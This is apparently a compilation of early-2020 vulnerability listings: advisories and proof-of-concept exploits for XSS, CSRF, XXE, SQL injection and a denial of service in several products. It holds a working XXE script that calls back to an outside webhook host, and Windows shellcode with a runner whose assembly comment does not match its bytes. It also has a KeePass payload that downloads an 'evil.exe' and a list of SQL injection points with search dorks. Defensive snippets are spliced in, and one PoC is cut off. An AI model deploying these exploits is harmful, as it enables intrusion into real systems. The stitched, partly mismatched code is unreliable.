ZOHO ManageEngine ServiceDeskPlus versions 11.0 Build 11007 and below suffer from a cross site scripting vulnerability.

MD5 | 12badb31b3d895bd0a427533aba4a756

SEC Consult Vulnerability Lab Security Advisory 
=======================================================================
title: Reflected XSS
product: ZOHO ManageEngine ServiceDeskPlus
vulnerable version: <= 11.0 Build 11007
fixed version: 11.0 Build 11010
CVE number: CVE-2020-6843
impact: medium
homepage: https://www.manageengine.com/products/service-desk/
found: 2019-12-01
by: Johannes Kruchem (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting
to delivering awesome customer service. It provides great visibility and central
control in dealing with IT issues to ensure that businesses suffer no downtime.
For 10 years and running, it has been delivering smiles to millions of IT folks,
end users, and stakeholders alike."

Source: https://www.manageengine.com/products/service-desk/



Business recommendation:
------------------------
The vendor published a patch for ServiceDesk Plus with service pack 11010.

It is recommended to install the patch with the included patcher. An in-depth
security analysis performed by security professionals is highly advised, as the
software may be affected by further security issues.


Vulnerability overview/description:
-----------------------------------
1) Reflected Cross-Site Scripting (CVE-2020-6843)
The "key" parameter of the module called "geti18nkey" reflects unfiltered user
input if its value is altered. The corresponding request is sent frequently in
the background once a pre-configured network scan has been started.


Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (CVE-2020-6843)
To reproduce the issue, visit the following URL while authenticated as administrator:
http://$IP:8080/CustomReportHandler.do?module=geti18nkey&key=

How the parameter was found:
1) Authenticate as administrator and add an IP range in Admin -> Networkscan.
2) Click the "play" button next to the created IP range to start the scan.
3) To check the status of a running network scan, requests like
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey&key=sdp.admin.network.listview.discoverystatus.scanned&sdpcsrfparam="
are sent to the server frequently.
4) The value of the "key" parameter is reflected if you change a single character.
The "sdpcsrfparam" parameter is not needed in order to trigger the XSS.
5) The XSS can thus be exploited by calling
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey&key="
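A detection check for the reflection described in steps 3 to 5, added here as an example; it is not part of the SEC Consult advisory or of ManageEngine's code. It assumes a combined-format access log in front of ServiceDesk Plus and that legitimate i18n keys are dotted identifiers like the one in step 3; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Legitimate keys look like sdp.admin.network.listview.discoverystatus.scanned
LEGIT_KEY = re.compile(r"^[A-Za-z0-9_.\-]+$")
# Minimal combined-log pattern: source, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_i18n_request(line):
    """Return the offending key when a geti18nkey request carries a non-identifier key, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/CustomReportHandler.do"):
        return None
    # keep_blank_values so an empty key= (as in the PoC URL) is still inspected
    qs = parse_qs(url.query, keep_blank_values=True)
    if qs.get("module") != ["geti18nkey"]:
        return None
    for key in qs.get("key", [""]):
        if not LEGIT_KEY.match(key):
            return key
    return None


def scan(lines):
    """Map source address -> list of suspicious keys seen, over an iterable of log lines."""
    hits = {}
    for line in lines:
        key = suspicious_i18n_request(line)
        if key is not None:
            hits.setdefault(LOG_LINE.match(line).group("src"), []).append(key)
    return hits


# Constructed sample lines: one legitimate status poll, one probe carrying
# markup in the key (URL-encoded), one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Dec/2019:10:00:01 +0100] "GET /CustomReportHandler.do?module=geti18nkey&key=sdp.admin.network.listview.discoverystatus.scanned&sdpcsrfparam=abc HTTP/1.1" 200 57',
    '10.0.0.9 - - [01/Dec/2019:10:00:02 +0100] "GET /CustomReportHandler.do?module=geti18nkey&key=sdp.admin%3Cx%3E HTTP/1.1" 200 61',
    '10.0.0.5 - - [01/Dec/2019:10:00:03 +0100] "GET /HomePage.do HTTP/1.1" 200 4410',
]
```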


Vulnerable / tested versions:
-----------------------------
The following versions, which were the latest available at the time of the
test, have been tested:
- 10.5
- 11.0 Build 11007


Vendor contact timeline:
------------------------
2019-12-05: Contacting vendor through ManageEngine Security Response Center (MESRC);
            uploaded security advisory to bugbounty.zoho.com
2019-12-09: Vendor promised to fix the vulnerability.
2020-01-08: Reported issue has been fixed in service pack 11010.
2020-01-22: Public release of security advisory.


Solution:
---------
The vendor provides an updated version which should be installed immediately.
https://www.manageengine.com/products/service-desk/download.html

The vendor also provided a link to their readme about the new release:
https://www.manageengine.com/products/service-desk/readme.html#11010


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Johannes Kruchem / @2020


Employee Leaves Management System version 2.0 suffers from a cross site request forgery vulnerability.

MD5 | 2ae268dfb5b02477de0b12594fff1310

# Exploit Title: Employee Leaves Management System 2.0 Cross-Site Request Forgery
# Date: 22-01-2020
# Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/employee-leaves-management-system-elms/
# Software: Employee Leaves Management System
# Version : 2.0
# Tested on Windows 10
# Vulnerability Type: Cross-Site Request Forgery
# Cross-site Request Forgery is an attack whereby an attacker tricks a victim into performing actions on their behalf.
# *1. Description*
# The vulnerability exists due to a failure of the "/managedepartments.php" script to properly verify the source of the HTTP request.
# This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary code by sending a malicious request to a logged-in user.
# *2. Proof of Concept:* This example sends a crafted HTTP GET request in order to delete the specified department.

<body
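The source-of-request check that the description says managedepartments.php lacks, modelled in Python as an added example (not the application's code). It assumes a deployment origin, a session dict, a department_id form field and simple dict-shaped requests; all of these are illustrative.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://elms.example.invalid"   # assumed deployment origin


def issue_csrf_token(session):
    """Store a fresh per-session token; the department form embeds it as a hidden field."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def same_origin(headers):
    """Accept only when Origin (or, failing that, Referer) matches our own origin."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN


def authorize_department_delete(request, session):
    """True only for a POST, from our origin, carrying the session's token."""
    if request["method"] != "POST":           # a plain link or image fetch must not delete
        return False
    if not same_origin(request["headers"]):
        return False
    expected = session.get("csrf_token")
    supplied = request["form"].get("csrf_token", "")
    if not expected:
        return False
    return hmac.compare_digest(expected, supplied)   # constant-time comparison


def demo():
    """Constructed requests: a cross-site GET (what a CSRF link relies on) vs. a legitimate form post."""
    session = {"user": "admin"}
    token = issue_csrf_token(session)
    cross_site_get = {"method": "GET",
                      "headers": {"Referer": "https://other-site.invalid/page"},
                      "form": {"department_id": "3"}}
    legit_post = {"method": "POST",
                  "headers": {"Origin": SITE_ORIGIN},
                  "form": {"department_id": "3", "csrf_token": token}}
    return (authorize_department_delete(cross_site_get, session),
            authorize_department_delete(legit_post, session))
```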




Citrix XenMobile Server version 10.8 suffers from an XML external entity injection vulnerability.

MD5 | 98dfa95366d3218a5c4e705da6798a5c

# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653

#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in
## XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28 https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##
## Usage: pass the XenMobile base URL (scheme and host) as the first argument.

import sys
import uuid
from pprint import pprint

import requests

# Surf to https://webhook.site and copy/paste the URL below. Used for XXE callback.
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"

# Unique id per run so an incoming callback can be matched to this attempt.
run_id = str(uuid.uuid1())

# plist prolog declaring an external parameter entity that points at the webhook.
xml = ('<?xml version="1.0" encoding="UTF-8" standalone=\'no\'?>'
       '<!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "' + WEBHOOK + run_id + '/test.dtd">%j00t9; ]>')

print(run_id)

response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
                        headers={'User-Agent': 'MDM/1.0',
                                 'Connection': 'close',
                                 'Content-Type': 'application/x-apple-aspen-mdm'},
                        data=xml, stream=True)
print(response.content)
print(response.text)
pprint(response)
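The server-side counterpart, added here as an example and not Citrix's code: a guard that refuses any DOCTYPE or entity declaration in an MDM check-in body before parsing it, which is what neutralises the external parameter entity construct the PoC above sends. Standard library only; both sample bodies are constructed and the callback host is a placeholder.

```python
import plistlib
import xml.parsers.expat


class UnsafeXml(ValueError):
    """Raised when a request body carries a DOCTYPE or entity declaration."""


def reject_dtd(body):
    """Stream the document through expat and abort on the first DTD construct.

    The handlers fire before any entity could be resolved, so an external
    parameter entity (SYSTEM "http://...") never causes a fetch.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml("DOCTYPE %r not allowed (system id %r)" % (name, sysid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXml("entity declaration %r not allowed" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(body, True)


def load_checkin(body):
    """Return the check-in dict, or raise UnsafeXml / ValueError."""
    reject_dtd(body)
    doc = plistlib.loads(body)
    if not isinstance(doc, dict):
        raise ValueError("MDM check-in must be a plist dict")
    return doc


def classify(body):
    """'ok' for a parsed check-in, 'blocked' when the DTD guard fires."""
    try:
        load_checkin(body)
        return "ok"
    except UnsafeXml:
        return "blocked"


# Constructed benign iOS MDM check-in (shape only, not real device data).
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>MessageType</key><string>Authenticate</string>
  <key>UDID</key><string>CONSTRUCTED-UDID-0000</string>
</dict></plist>"""

# Constructed body in the shape of the PoC: an external parameter entity
# pointing at a DTD on a placeholder host.
XXE_SHAPED = b"""<?xml version="1.0" encoding="UTF-8" standalone='no'?>
<!DOCTYPE plist [<!ENTITY % ext SYSTEM "http://callback.invalid/test.dtd">%ext; ]>
<plist version="1.0"><dict/></plist>"""
```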


9 bytes small Microsoft Windows 7 screen locking shellcode.

MD5 | 342333e070d67e23f69ad3f94c730111

# Title: Windows/7 - Screen Lock Shellcode (9 bytes)
# Author: Saswat Nayak
# Date: 2020-01-22
# Shellcode length 9
# Tested on: Win 7 SP1-64

/*
***** Assembly code follows *****
xor eax,eax
xor ebx,ebx
xor ecx,ecx
mov eax,0x00000002
mov ebx,0x00020000
push ebx
push al
mov ecx,0x77661497
call ecx


*/

/* 9-byte payload. The bytes decode as:
   31 C0            xor eax,eax
   B8 6F 86 67 77   mov eax,0x7767866F
   FF D0            call eax                                          */
char code[] =
"\x31\xC0\xB8\x6F\x86\x67\x77\xFF\xD0";

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;   /* treat the byte array as a function */
    (*func)();                 /* transfer control to the shellcode */
}


KeePass version 2.44 suffers from a denial of service vulnerability.

MD5 | e3921df2f71a715fc3761f07b520768e

# Exploit Title : KeePass 2.44 - Denial of Service (PoC)
# Product : KeePass Password Safe
# Version : < 2.44
# Date: 2020-01-22
# Vendor Homepage: https://keepass.info/
# Exploit Author: Mustafa Emre Gül
# Website: https://emregul.com.tr/
# Tested On : Win10 x64
# Description : The free, open source, light-weight and easy-to-use password manager.


PoC:
Open KeePass > Help > About KeePass > Help (any local help area) >
Drag&Drop HTML File

Save the payload contents to an HTML file.


Payload-1:
(DoS & Run Cmd)



Payload-2:
(run iexplorer.exe & download infected file)



function exec(cmdline, params) {
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var fileExist = fso.FileExists(cmdline);
    if (!fileExist) {
        alert("The requested application is not installed.");
    }
    else {
        var shell = new ActiveXObject("WScript.Shell");
        if (params) {
            params = ' ' + params;
        }
        else {
            params = '';
        }
        shell.Run('"' + cmdline + '"' + params);
    }
}

<a href="javascript:exec('C:\Program Files\Internet Explorer\iexplore.exe', '-nomerge http://ipaddress/evil.exe');">Edition Mode Active</a>


ECTouch ECShop version 2.7.3 suffers from a remote SQL injection vulnerability.

MD5 | 0ba14f6875fb0a9daeddafb224ed1358

###################################################################

# Exploit Title : ECTouch ECShop v2.7.3 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/01/2020
# Vendor Homepage : ecshop.com - ectouch.cn
# Software Download Link : ecshop.com/download
# Software Affected Versions : 1.0 and 2.7.3
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/mobile/index.php?m=default site:cn
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
ECTouch ECShop v2.7.3 is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or any SQL injection tool.

###################################################################

# Administrator Panel Login Path :
******************************
/mobile/user.php?act=login

# Vulnerable SQL Injection Parameters :
*************************************
&id=
&brand=
&price_min=
&price_max=
&filter_attr=
&page=

# SQL Injection Exploit :
**********************
/mobile/index.php?m=default&c=category&a=asynclist&id=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[ID-NUMBER]&price_max=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[ID-NUMBER]&price_max=[ID-NUMBER]&filter_attr=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[ID-NUMBER]&price_max=[ID-NUMBER]&filter_attr=[ID-NUMBER]&page=[SQL Injection]&sort=sales_volume&order=ASC

###################################################################

# Example SQL Database Error :
****************************
MySQL Query Error
Warning: Division by zero in C:\web\WWW\xiuyoupu\mobile\include\apps\default\controller\CategoryController.class.php on line 100
SQL: SELECT g.goods_id, g.goods_name, g.goods_name_style, g.market_price,
g.is_new, g.is_best, g.is_hot, g.brand_id, g.shop_price AS org_price, g.seller_credit,
g.best_rating, g.cat_id, g.admin_user_id, g.store_card6, g.store_card7, g.store_card8,
g.grade, g.enter_time, g.kejara, g.trademark_type, g.grade, g.mail_type, g.cash_deposit,
IFNULL(mp.user_price, g.shop_price) AS shop_price, g.promote_price, g.goods_type,
g.promote_start_date, g.promote_end_date, g.goods_brief, g.goods_thumb, g.goods_img,
xl.sales_volume FROM ecs_goods AS g LEFT JOIN ecs_touch_goods AS xl ON
g.goods_id = xl.goods_id LEFT JOIN ecs_member_price AS mp ON mp.goods_id =
g.goods_id AND mp.user_rank = '0' WHERE g.is_on_sale = 1 AND g.is_alone_sale =
1 AND g.goods_number > 0 AND g.is_delete = 0 AND (g.cat_id IN ('1153')
OR g.goods_id IN ('') ) ORDER BY goods_id DESC LIMIT -0 ,
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '-0 ,' at line 1
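The corrective pattern for the parameters listed above, added here as an example and not ECShop's code: each of id, brand, price_min, price_max and page is coerced strictly to an integer and bound as a placeholder, so a quote appended to any of them is rejected before it can reach the query, and page is range-checked so the LIMIT clause in the error above cannot be produced. The in-memory sqlite3 table and its rows are constructed and carry only a subset of the ecs_goods columns.

```python
import sqlite3

INT_PARAMS = ("id", "brand", "price_min", "price_max", "page")
PAGE_SIZE = 10


def parse_params(query):
    """Strict integer parsing of every listed parameter; anything else raises ValueError."""
    out = {}
    for name in INT_PARAMS:
        raw = query.get(name, "0")
        if not raw.lstrip("-").isdigit():
            raise ValueError("%s must be an integer, got %r" % (name, raw))
        out[name] = int(raw)
    if out["page"] < 1:
        raise ValueError("page must be >= 1")   # rules out a negative/zero LIMIT offset
    return out


def async_list(conn, query):
    """Category listing with every user value bound as a placeholder (0 means 'no filter')."""
    p = parse_params(query)
    sql = ("SELECT goods_id, goods_name, shop_price FROM ecs_goods "
           "WHERE is_on_sale = 1 AND is_delete = 0 AND cat_id = ? "
           "AND (? = 0 OR brand_id = ?) "
           "AND (? = 0 OR shop_price >= ?) AND (? = 0 OR shop_price <= ?) "
           "ORDER BY goods_id DESC LIMIT ? OFFSET ?")
    args = (p["id"], p["brand"], p["brand"], p["price_min"], p["price_min"],
            p["price_max"], p["price_max"], PAGE_SIZE, (p["page"] - 1) * PAGE_SIZE)
    return conn.execute(sql, args).fetchall()


def demo_db():
    """Constructed in-memory table with three goods rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ecs_goods (goods_id INTEGER, goods_name TEXT, shop_price REAL, "
                 "cat_id INTEGER, brand_id INTEGER, is_on_sale INTEGER, is_delete INTEGER)")
    conn.executemany("INSERT INTO ecs_goods VALUES (?,?,?,?,?,?,?)", [
        (1, "constructed item A", 10.0, 1153, 0, 1, 0),
        (2, "constructed item B", 25.0, 1153, 7, 1, 0),
        (3, "constructed item C", 40.0, 99, 0, 1, 0),
    ])
    return conn
```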

###################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################


This application, known as the SolarWinds n-Central Dumpster Diver, utilizes the nCentral agent .NET libraries to simulate the agent registration and pull the agent/appliance configuration settings. This information can contain plain-text Active Directory domain credentials. This was reported to SolarWinds PSIRT (psirt@solarwinds.com) on 10/10/2019. In most cases the agent download URL is not secured, allowing anyone without authorization, given a known customer id, to download the agent software. Once you have a customer id you can self-register and pull the config. The application first tests the availability of the customer id via the agent download URL; if successful, it then pulls the config. We do not attempt to pull the config directly because timing out on that operation takes too long. Removing the initial check could produce more results, as the agent download could be blocked whereas agent communication would not be. Harmony is only used to block the nCentral libraries from saving and creating a config directory that is not needed.

MD5 | 327907230e1957acb4b9383e511c3db6


Revive Adserver versions 5.0.3 and below suffer from a cross site scripting vulnerability.

MD5 | 876b5c6e7b14f9d76a23e57cfee6a8f9

========================================================================
Revive Adserver Security Advisory REVIVE-SA-2020-001
------------------------------------------------------------------------
https://www.revive-adserver.com/security/revive-sa-2020-001
------------------------------------------------------------------------
CVE-IDs: t.b.a.
Date: 2020-01-21
Risk Level: Low
Applications affected: Revive Adserver
Versions affected: <= 5.0.3
Versions not affected: >= 5.0.4
Website: https://www.revive-adserver.com/
========================================================================


========================================================================
Vulnerability - Reflected XSS
========================================================================
Vulnerability Type: Improper Neutralization of Input During Web Page
Generation ('Cross-site Scripting') [CWE-79]
CVE-ID: t.b.a.
CVSS Base Score: 4.3
CVSSv3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
CVSS Impact Subscore: 1.4
CVSS Exploitability Subscore: 2.8
========================================================================

Description
-----------
A reflected XSS vulnerability has been discovered in the publicly
accessible afr.php delivery script of Revive Adserver by Jacopo Tediosi.
There are currently no known exploits: the session identifier cannot
be accessed as it is stored in an http-only cookie as of v3.2.2. On
older versions, however, under specific circumstances, it could be
possible to steal the session identifier and gain access to the admin
interface.

Details
-------
The query string sent to the www/delivery/afr.php script was printed
back without proper escaping in a JavaScript context, allowing an
attacker to execute arbitrary JS code on the browser of the victim.
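An added example of the escaping a delivery script needs when it reflects a query string into a JavaScript context; it is not Revive Adserver's code and does not reproduce the afr.php fix referenced below. The naive concatenation is shown only for comparison; the safe form uses json.dumps (which escapes quotes, backslashes, control characters and, with the default ensure_ascii, all non-ASCII including U+2028/2029) plus explicit escaping of the three HTML-significant characters so the literal cannot close the script element.

```python
import json

# Characters json.dumps leaves alone but which matter inside <script>.
_EXTRA = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def js_string_literal(value):
    """Double-quoted JS string literal safe to embed inside <script>...</script>."""
    out = json.dumps(value)
    for ch, esc in _EXTRA.items():
        out = out.replace(ch, esc)
    return out


def render_naive(query_string):
    """The vulnerable pattern: raw interpolation into JS source (comparison only)."""
    return '<script>var q = "%s";</script>' % query_string


def render_safe(query_string):
    """The hardened pattern: the value is a JS literal, never JS source."""
    return "<script>var q = %s;</script>" % js_string_literal(query_string)


def roundtrip(value):
    """The escaped literal still decodes to the original value (no data lost)."""
    return json.loads(js_string_literal(value)) == value


def script_closers(html):
    """Number of closing script tags a browser would see in the rendered page."""
    return html.lower().count("</script>")
```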


References
----------
https://hackerone.com/reports/775693
https://github.com/revive-adserver/revive-adserver/commit/327aaf10
https://github.com/revive-adserver/revive-adserver/commit/9ec2fa26
https://cwe.mitre.org/data/definitions/79.html



========================================================================
Solution
========================================================================

We strongly advise people to upgrade to the most recent 5.0.4 version of
Revive Adserver.


========================================================================
Contact Information
========================================================================

The security contact for Revive Adserver can be reached at:
.

Please review https://www.revive-adserver.com/security/ before doing so.


--
Matteo Beccati
On behalf of the Revive Adserver Team
https://www.revive-adserver.com/



Park Ticketing Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

MD5 | 1e843f25a9ae3b474d06c5f3b5494406

# Exploit Title: Park Ticketing Management System 1.0 Stored Cross-Site Scripting Vulnerability
# Date: 2020-01-21
# Exploit Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/

# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/

# Software: Park Ticketing Management System
# Version : 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10
# This application is vulnerable to a Stored XSS vulnerability. This
# Vulnerable script: http://localhost/ptms/normal-search.php
# Vulnerable parameter: ‘search ticket’ Input Field

# Payload used: alert(123)
# POC: open http://localhost/ptms/normal-search.php and enter the
# specially crafted ticket number in the search field.
# Click on search and you will see your JavaScript code execute.


Thanks and Regards,

Priyanka Samak
